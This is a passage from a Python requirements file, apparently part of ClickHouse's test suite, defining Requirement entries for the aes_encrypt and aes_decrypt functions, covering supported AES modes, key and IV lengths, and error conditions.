name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ctr` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CTR = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ctr` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CTR = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ctr` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_InitializationVector = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.InitializationVector',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `iv` with `String` or `FixedString` data types as the optional fourth\n'
'parameter to the `aes_encrypt` function that SHALL specify the initialization vector for block modes that require\n'
'it.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_AdditionalAuthenticatedData = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.AdditionalAuthenticatedData',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aad` with `String` or `FixedString` data types as the optional fifth\n'
'parameter to the `aes_encrypt` function that SHALL specify the additional authenticated data\n'
'for block modes that require it.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_ReturnValue = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.ReturnValue',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return the encrypted value of the data\n'
'using `String` data type as the result of `aes_encrypt` function.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Key_Length_InvalidLengthError = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Key.Length.InvalidLengthError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `key` length is not exact for the `aes_encrypt` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_InitializationVector_Length_InvalidLengthError = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.InitializationVector.Length.InvalidLengthError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` length is specified and not of the exact size for the `aes_encrypt` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_InitializationVector_NotValidForMode = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.InitializationVector.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is specified for the `aes_encrypt` function for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AdditionalAuthenticationData_NotValidForMode = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AdditionalAuthenticationData.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `aad` is specified for the `aes_encrypt` function for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AdditionalAuthenticationData_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AdditionalAuthenticationData.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL not limit the size of the `aad` parameter passed to the `aes_encrypt` function.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-ecb` and `key` is not 16 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-ecb` and `key` is not 24 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-ecb` and `key` is not 32 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-cbc` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-cbc` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-cbc` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-cfb1` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-cfb1` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-cfb1` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-cfb8` and `key` is not 16 bytes\n'
'and if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-cfb8` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-cfb8` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-cfb128` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-cfb128` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-cfb128` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-ofb` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-ofb` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-ofb` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-gcm` and `key` is not 16 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-gcm` and `key` is not 24 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-gcm` and `key` is not 32 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-ctr` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-ctr` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-ctr` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function = Requirement(
name='RQ.SRS008.AES.Decrypt.Function',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes_decrypt` function to decrypt data using [AES].\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Syntax = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Syntax',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support the following syntax for the `aes_decrypt` function\n'
'\n'
'```sql\n'
'aes_decrypt(ciphertext, key, mode, [iv, aad])\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_CipherText = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.CipherText',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `ciphertext` accepting `FixedString` or `String` data types as\n'
'the first parameter to the `aes_decrypt` function that SHALL specify the data to be decrypted.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Key = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Key',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `key` with `String` or `FixedString` data types\n'
'as the second parameter to the `aes_decrypt` function that SHALL specify the encryption key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `mode` with `String` or `FixedString` data types as the third parameter\n'
'to the `aes_decrypt` function that SHALL specify encryption key length and block encryption mode.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_ValuesFormat = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.ValuesFormat',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support values of the form `aes-[key length]-[mode]` for the `mode` parameter\n'
'of the `aes_decrypt` function where\n'
'the `key_length` SHALL specifies the length of the key and SHALL accept\n'
'`128`, `192`, or `256` as the values and the `mode` SHALL specify the block encryption\n'
'mode and SHALL accept [ECB], [CBC], [CFB1], [CFB8], [CFB128], or [OFB] as well as\n'
'[CTR] and [GCM] as the values. For example, `aes-256-ofb`.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_Invalid = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.Invalid',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the specified value for the `mode` parameter of the `aes_decrypt`\n'
'function is not valid with the exception where such a mode is supported by the underlying\n'
'[OpenSSL] implementation.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_ECB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ecb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_ECB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ecb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_ECB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ecb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CBC = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cbc` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CBC = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cbc` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CBC = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cbc` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB1 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb1` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB1 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb1` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB1 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb1` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB8 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb8` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB8 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb8` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB8 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb8` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB128 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb128` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB128 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb128` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB128 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb128` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_OFB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ofb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_OFB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ofb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_OFB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ofb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_GCM = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-gcm` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 128 bit key.\n'
'An [AEAD] 16-byte tag is expected present at the end of the ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_GCM = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-gcm` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 192 bit key.\n'
'An [AEAD] 16-byte tag is expected present at the end of the ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_GCM = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-gcm` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 256 bit key.\n'
'An [AEAD] 16-byte tag is expected present at the end of the ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CTR = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ctr` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CTR = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ctr` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CTR = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ctr` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_InitializationVector = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.InitializationVector',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `iv` with `String` or `FixedString` data types as the optional fourth\n'
'parameter to the `aes_decrypt` function that SHALL specify the initialization vector for block modes that require\n'
'it.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_AdditionalAuthenticatedData = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.AdditionalAuthenticatedData',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
